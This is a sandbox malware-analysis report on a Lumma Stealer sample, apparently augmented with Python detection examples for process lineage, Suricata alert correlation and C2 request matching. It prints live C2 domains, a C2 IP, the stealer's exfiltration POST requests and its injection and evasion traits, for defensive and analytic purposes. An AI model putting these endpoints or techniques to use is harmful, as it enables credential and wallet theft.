
Windows Analysis Report
MPySEh8HaF.exe

Overview

General Information

Sample name: MPySEh8HaF.exe (renamed because the original name is a hash value)
Original sample name: 58cffd92455eec9cd613ede591ed6c2c.exe
Analysis ID: 1580844
MD5: 58cffd92455eec9cd613ede591ed6c2c
SHA1: 388ef427a8f87c9e20a1cb7408b7bd4e81ed4117
SHA256: a7c488cf2a71ee29da1d9267bd7d3bc9f9e4d5ff1c2da0db5669e0af44a232e8
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • MPySEh8HaF.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\MPySEh8HaF.exe" MD5: 58CFFD92455EEC9CD613EDE591ED6C2C)
    • BitLockerToGo.exe (PID: 7676 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
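The process tree above shows a user-profile executable spawning the signed Windows binary BitLockerToGo.exe, which the signature list names as the target of suspended-process creation, foreign-memory writes and PE injection. That parent/child relationship is visible in any process-creation log. The following is an added example, not part of the Joe Sandbox report, that runs one lineage rule over constructed Sysmon Event ID 1-style events mirroring the tree; the explorer.exe parent of MPySEh8HaF.exe and the svchost.exe control event are assumptions made for illustration.

```python
"""Flag Windows-signed binaries launched from a user-writable location.

The events below are constructed to mirror the process tree in the report
(PIDs, images and command lines); Sysmon Event ID 1 is assumed as the source
format. The explorer.exe parent for the sample and the svchost.exe event are
illustrative, not taken from the report.
"""

# Locations a standard user can write to. A C:\Windows binary whose parent
# lives here deserves a look; the report's sample ran from the user's Desktop.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)

# Constructed process-creation events (Sysmon Event ID 1 field names).
EVENTS = [
    {
        "ProcessId": 7420,
        "Image": r"C:\Users\user\Desktop\MPySEh8HaF.exe",
        "CommandLine": r'"C:\Users\user\Desktop\MPySEh8HaF.exe"',
        "ParentProcessId": 4200,                     # assumed
        "ParentImage": r"C:\Windows\explorer.exe",   # assumed
    },
    {
        "ProcessId": 7676,
        "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
        "CommandLine": r'"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"',
        "ParentProcessId": 7420,
        "ParentImage": r"C:\Users\user\Desktop\MPySEh8HaF.exe",
    },
    {
        "ProcessId": 8000,                           # benign control event, assumed
        "Image": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
        "ParentProcessId": 700,
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
]


def _norm(path: str) -> str:
    """Lower-case and normalise separators so prefix checks are stable."""
    return path.replace("/", "\\").lower()


def is_windows_image(path: str) -> bool:
    """True for images under C:\\Windows, where BitLockerToGo.exe lives."""
    return _norm(path).startswith("c:\\windows\\")


def parent_is_user_writable(path: str) -> bool:
    """True when the parent image sits in a location a normal user can write."""
    return _norm(path).startswith(USER_WRITABLE_PREFIXES)


def evaluate(event: dict):
    """Return a finding for a suspicious event, or None."""
    if is_windows_image(event["Image"]) and parent_is_user_writable(event["ParentImage"]):
        return {
            "rule": "windows_binary_spawned_from_user_writable_path",
            "pid": event["ProcessId"],
            "image": event["Image"],
            "parent_pid": event["ParentProcessId"],
            "parent_image": event["ParentImage"],
        }
    return None


def detect(events: list) -> list:
    """Run the rule over all events and keep the findings."""
    return [f for f in map(evaluate, events) if f]


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['rule']}] pid {f['pid']} {f['image']} <- pid {f['parent_pid']} {f['parent_image']}")
```

Event ID 1 only records lineage. The suspended-mode creation and the writes into BitLockerToGo.exe's memory that the signatures describe would show up in Sysmon Event ID 10 (ProcessAccess) or an EDR's injection telemetry, so this rule is a cheap first filter, not proof of hollowing.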
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration:
{"C2 url": ["treehoneyi.click", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "rAGxSF--sheev"}
Yara matches (source, rule, description, author):
  sslproxydump.pcap: JoeSecurity_LummaCStealer_3, Yara detected LummaC Stealer, Joe Security
  sslproxydump.pcap: JoeSecurity_LummaCStealer_2, Yara detected LummaC Stealer, Joe Security
  00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  (4 further Yara entries are not included in this extract)
No Sigma rule has matched
Suricata IDS alerts (Timestamp, SID, Severity, Classtype, Source IP:Port -> Destination IP:Port, Protocol):

2024-12-26T12:01:25.214023+0100  2028371  3  Unknown Traffic                                192.168.2.4:49735 -> 172.67.180.113:443  TCP
2024-12-26T12:01:27.363336+0100  2028371  3  Unknown Traffic                                192.168.2.4:49737 -> 172.67.180.113:443  TCP
2024-12-26T12:01:30.177968+0100  2028371  3  Unknown Traffic                                192.168.2.4:49738 -> 172.67.180.113:443  TCP
2024-12-26T12:01:32.745925+0100  2028371  3  Unknown Traffic                                192.168.2.4:49739 -> 172.67.180.113:443  TCP
2024-12-26T12:01:35.447332+0100  2028371  3  Unknown Traffic                                192.168.2.4:49740 -> 172.67.180.113:443  TCP
2024-12-26T12:01:37.988249+0100  2028371  3  Unknown Traffic                                192.168.2.4:49741 -> 172.67.180.113:443  TCP
2024-12-26T12:01:40.516752+0100  2028371  3  Unknown Traffic                                192.168.2.4:49742 -> 172.67.180.113:443  TCP
2024-12-26T12:01:43.487771+0100  2028371  3  Unknown Traffic                                192.168.2.4:49743 -> 172.67.180.113:443  TCP
2024-12-26T12:01:25.996826+0100  2054653  1  A Network Trojan was detected                  192.168.2.4:49735 -> 172.67.180.113:443  TCP
2024-12-26T12:01:28.174922+0100  2054653  1  A Network Trojan was detected                  192.168.2.4:49737 -> 172.67.180.113:443  TCP
2024-12-26T12:01:25.996826+0100  2049836  1  A Network Trojan was detected                  192.168.2.4:49735 -> 172.67.180.113:443  TCP
2024-12-26T12:01:28.174922+0100  2049812  1  A Network Trojan was detected                  192.168.2.4:49737 -> 172.67.180.113:443  TCP
2024-12-26T12:01:31.200309+0100  2048094  1  Malware Command and Control Activity Detected  192.168.2.4:49738 -> 172.67.180.113:443  TCP
2024-12-26T12:01:40.521382+0100  2843864  1  A Network Trojan was detected                  192.168.2.4:49742 -> 172.67.180.113:443  TCP
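Every flow in the alert list above carries the severity-3 JA3 hit (SID 2028371), but only four of the eight client ports also trigger a severity-1 ET MALWARE rule. Correlating by flow rather than by alert is what separates a weak fingerprint hint from a confirmed Lumma session. The following is an added example, not part of the Joe Sandbox report, that groups constructed alert rows (copied from the table above, not an eve.json export) per TCP flow and assigns each flow a verdict.

```python
"""Correlate Suricata alerts per TCP flow and rank flows by what fired on them.

The alert rows below are constructed from the report's Suricata tables (same
SIDs, severities, classtypes, ports and timestamps); they are not an eve.json
export. SID 2028371 is the JA3-hash rule, which on its own is only a
severity-3 hint; it becomes actionable when a severity-1 ET MALWARE rule fires
on the same flow.
"""
from collections import Counter
from typing import NamedTuple


class Alert(NamedTuple):
    ts: str
    sid: int
    severity: int
    classtype: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


SRC, DST = "192.168.2.4", "172.67.180.113"
JA3_SID = 2028371  # ET JA3 Hash - Possible Malware - Fake Firefox Font Update
C2_CLASSTYPE = "Malware Command and Control Activity Detected"

# Constructed from the report's alert tables; destination port is always 443/TCP.
ALERTS = [Alert(ts, sid, sev, ct, SRC, sport, DST, 443) for ts, sid, sev, ct, sport in [
    ("2024-12-26T12:01:25.214023+0100", 2028371, 3, "Unknown Traffic", 49735),
    ("2024-12-26T12:01:27.363336+0100", 2028371, 3, "Unknown Traffic", 49737),
    ("2024-12-26T12:01:30.177968+0100", 2028371, 3, "Unknown Traffic", 49738),
    ("2024-12-26T12:01:32.745925+0100", 2028371, 3, "Unknown Traffic", 49739),
    ("2024-12-26T12:01:35.447332+0100", 2028371, 3, "Unknown Traffic", 49740),
    ("2024-12-26T12:01:37.988249+0100", 2028371, 3, "Unknown Traffic", 49741),
    ("2024-12-26T12:01:40.516752+0100", 2028371, 3, "Unknown Traffic", 49742),
    ("2024-12-26T12:01:43.487771+0100", 2028371, 3, "Unknown Traffic", 49743),
    ("2024-12-26T12:01:25.996826+0100", 2054653, 1, "A Network Trojan was detected", 49735),
    ("2024-12-26T12:01:28.174922+0100", 2054653, 1, "A Network Trojan was detected", 49737),
    ("2024-12-26T12:01:25.996826+0100", 2049836, 1, "A Network Trojan was detected", 49735),
    ("2024-12-26T12:01:28.174922+0100", 2049812, 1, "A Network Trojan was detected", 49737),
    ("2024-12-26T12:01:31.200309+0100", 2048094, 1, C2_CLASSTYPE, 49738),
    ("2024-12-26T12:01:40.521382+0100", 2843864, 1, "A Network Trojan was detected", 49742),
]]


def flow_key(a: Alert) -> tuple:
    """4-tuple identifying one TCP connection (client port differs per flow)."""
    return (a.src_ip, a.src_port, a.dst_ip, a.dst_port)


def correlate(alerts: list) -> dict:
    """Group alerts by flow and derive a verdict from the SIDs that fired."""
    flows = {}
    for a in sorted(alerts, key=lambda x: x.ts):  # ISO timestamps sort lexically
        f = flows.setdefault(flow_key(a), {
            "sids": set(), "classtypes": set(), "top_severity": 4,
            "first_seen": a.ts, "last_seen": a.ts,
        })
        f["sids"].add(a.sid)
        f["classtypes"].add(a.classtype)
        f["top_severity"] = min(f["top_severity"], a.severity)  # Suricata: 1 is highest
        f["last_seen"] = a.ts
    for f in flows.values():
        has_ja3 = JA3_SID in f["sids"]
        has_malware = f["top_severity"] == 1 and any(s != JA3_SID for s in f["sids"])
        f["c2"] = C2_CLASSTYPE in f["classtypes"]
        if has_ja3 and has_malware:
            f["verdict"] = "ja3+malware"
        elif has_malware:
            f["verdict"] = "malware"
        elif has_ja3:
            f["verdict"] = "ja3_only"
        else:
            f["verdict"] = "other"
    return flows


def escalated_flows(alerts: list) -> list:
    """Flows that deserve an analyst, sorted by client port."""
    return sorted(k for k, v in correlate(alerts).items() if v["verdict"] in ("ja3+malware", "malware"))


def summary(alerts: list) -> dict:
    """Verdict histogram, e.g. {'ja3+malware': 4, 'ja3_only': 4} for the report's data."""
    return dict(Counter(v["verdict"] for v in correlate(alerts).values()))


if __name__ == "__main__":
    for key, f in sorted(correlate(ALERTS).items()):
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  {f['verdict']:12}  sids={sorted(f['sids'])}")
    print(summary(ALERTS))
```

The four JA3-only flows (49739, 49740, 49741, 49743) are still part of the same session to 172.67.180.113; once one flow to that host is confirmed, pivoting on the destination IP picks them up, but the JA3 hash alone would not justify that on a busy network.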


                AV Detection

Source: MPySEh8HaF.exe, Avira: detected
Source: 2.2.BitLockerToGo.exe.530000.0.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["treehoneyi.click", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "rAGxSF--sheev"}
Source: MPySEh8HaF.exe, ReversingLabs: Detection: 55%
Source: MPySEh8HaF.exe, Virustotal: Detection: 58%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp, String decryptor (each C2 domain is recovered five times in this dump and listed once here; strings reproduced verbatim):
  rapeflowwj.lat
  crosshuaht.lat
  sustainskelet.lat
  aspecteirs.lat
  energyaffai.lat
  necklacebudi.lat
  discokeyus.lat
  grannyejh.lat
  treehoneyi.click
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  rAGxSF--sheev
Source: MPySEh8HaF.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown, HTTPS traffic detected (TLS 1.2): 172.67.180.113:443 -> 192.168.2.4, client ports 49735, 49737, 49738, 49739, 49740, 49741, 49742
Source: MPySEh8HaF.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Directory queried: number of queries: 1001

                Networking

Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.180.113:443
Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.180.113:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.180.113:443
Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.180.113:443
Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 172.67.180.113:443
Source: Network traffic, Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 172.67.180.113:443
Source: Malware configuration extractor, URLs: treehoneyi.click, necklacebudi.lat, aspecteirs.lat, grannyejh.lat, energyaffai.lat, discokeyus.lat, rapeflowwj.lat, sustainskelet.lat, crosshuaht.lat
Source: Joe Sandbox View, IP Address: 172.67.180.113
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4 -> 172.67.180.113:443 (client ports 49735, 49737, 49738, 49739, 49740, 49741, 49742, 49743)
Source: global traffic, HTTP traffic detected (all requests to Host: treehoneyi.click with Connection: Keep-Alive and User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36):
  POST /api HTTP/1.1  Content-Type: application/x-www-form-urlencoded  Content-Length: 8
  POST /api HTTP/1.1  Content-Type: application/x-www-form-urlencoded  Content-Length: 47
  POST /api HTTP/1.1  Content-Type: multipart/form-data; boundary=QN7TZRE36WB  Content-Length: 18121
  POST /api HTTP/1.1  Content-Type: multipart/form-data; boundary=NZKI1E0ZV4QP4CG2X  Content-Length: 8778
  POST /api HTTP/1.1  Content-Type: multipart/form-data; boundary=5WUKJX71OLLRGG  Content-Length: 20413
  POST /api HTTP/1.1  Content-Type: multipart/form-data; boundary=UYZYJ2CR9XWAI  Content-Length: 1244
  POST /api HTTP/1.1  Content-Type: multipart/form-data; boundary=5CCKHBLPQDP6JKKB  Content-Length: 573418
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: treehoneyi.click
Source: unknown, HTTP traffic detected: POST /api HTTP/1.1  Content-Type: application/x-www-form-urlencoded  Content-Length: 8  Host: treehoneyi.click (same headers as the first request listed above)
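The request sequence above is the shape to key on: two small application/x-www-form-urlencoded POSTs to /api on a configured C2 domain, followed by multipart/form-data POSTs to the same endpoint whose sizes grow as collected data is uploaded, the last one over half a megabyte. The following is an added example, not part of the Joe Sandbox report, that takes the extracted configuration (C2 domains and build id) and classifies constructed proxy-style request records copied from the headers above; the GET to example.com is an added benign control, and the request bodies are not in the report, so nothing here inspects them.

```python
"""Match proxy-style HTTP request records against the extracted LummaC config.

CONFIG is the configuration the report's extractor recovered (C2 domains and
build id). REQUESTS is constructed from the request headers listed in the
report: two small application/x-www-form-urlencoded POSTs to /api followed by
multipart/form-data POSTs of growing size. The GET to example.com is an added
benign control. Request bodies are not in the report, so they are not checked.
"""

CONFIG = {
    "C2 url": [
        "treehoneyi.click", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat",
        "energyaffai.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat",
        "crosshuaht.lat",
    ],
    "Build id": "rAGxSF--sheev",
}

UA_CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def _req(method, path, host, ctype, clen, ua=UA_CHROME):
    """Build one request record in the shape a proxy log would give us."""
    return {"method": method, "path": path, "host": host,
            "content_type": ctype, "content_length": clen, "user_agent": ua}


# Constructed from the report's captured request headers, in observed order.
REQUESTS = [
    _req("POST", "/api", "treehoneyi.click", "application/x-www-form-urlencoded", 8),
    _req("POST", "/api", "treehoneyi.click", "application/x-www-form-urlencoded", 47),
    _req("POST", "/api", "treehoneyi.click", "multipart/form-data; boundary=QN7TZRE36WB", 18121),
    _req("POST", "/api", "treehoneyi.click", "multipart/form-data; boundary=NZKI1E0ZV4QP4CG2X", 8778),
    _req("POST", "/api", "treehoneyi.click", "multipart/form-data; boundary=5WUKJX71OLLRGG", 20413),
    _req("POST", "/api", "treehoneyi.click", "multipart/form-data; boundary=UYZYJ2CR9XWAI", 1244),
    _req("POST", "/api", "treehoneyi.click", "multipart/form-data; boundary=5CCKHBLPQDP6JKKB", 573418),
    _req("GET", "/", "example.com", "", 0),  # constructed benign control
]


def defang(domain: str) -> str:
    """Render a domain so it cannot be clicked when pasted into a ticket."""
    return domain.replace(".", "[.]")


def host_in_c2(host: str, c2_domains: list) -> bool:
    """Exact or subdomain match against the configured C2 list (case-insensitive)."""
    h = host.lower().rstrip(".").split(":")[0]  # drop a trailing dot and any port
    for d in (x.lower() for x in c2_domains):
        if h == d or h.endswith("." + d):
            return True
    return False


def iocs(config: dict) -> dict:
    """Defanged indicators straight from the extracted configuration."""
    return {"domains": [defang(d) for d in config["C2 url"]], "build_id": config["Build id"]}


def classify_session(requests: list, config: dict) -> dict:
    """Classify a host's requests by the check-in-then-upload pattern to /api."""
    hits = [r for r in requests
            if r["method"] == "POST" and r["path"] == "/api"
            and host_in_c2(r["host"], config["C2 url"])]
    beacons = [r for r in hits if r["content_type"].startswith("application/x-www-form-urlencoded")]
    uploads = [r for r in hits if r["content_type"].startswith("multipart/form-data")]
    hosts = sorted({r["host"].lower() for r in hits})
    if beacons and uploads:
        verdict = "c2_checkin_and_exfil"
    elif beacons:
        verdict = "c2_checkin"
    elif hits:
        verdict = "c2_contact"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "c2_hosts": [defang(h) for h in hosts],
        "beacons": len(beacons),
        "uploads": len(uploads),
        "bytes_uploaded": sum(r["content_length"] for r in uploads),
    }


if __name__ == "__main__":
    print(iocs(CONFIG))
    print(classify_session(REQUESTS, CONFIG))
```

The traffic in this analysis used a Chrome user agent rather than the "TeslaBrowser/5.5" string the decryptor recovered, so the example keys on host and request shape, not on the user agent. It also stops at the HTTP layer: the TLS session to 172.67.180.113 only exposes these headers where a proxy or sandbox is terminating TLS, as sslproxydump.pcap was here.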
Source: MPySEh8HaF.exe, String found in binary or memory: http://.css
Source: MPySEh8HaF.exe, String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: MPySEh8HaF.exe, String found in binary or memory: http://html4/loose.dtd
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1977772504.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://treehoneyi.click/
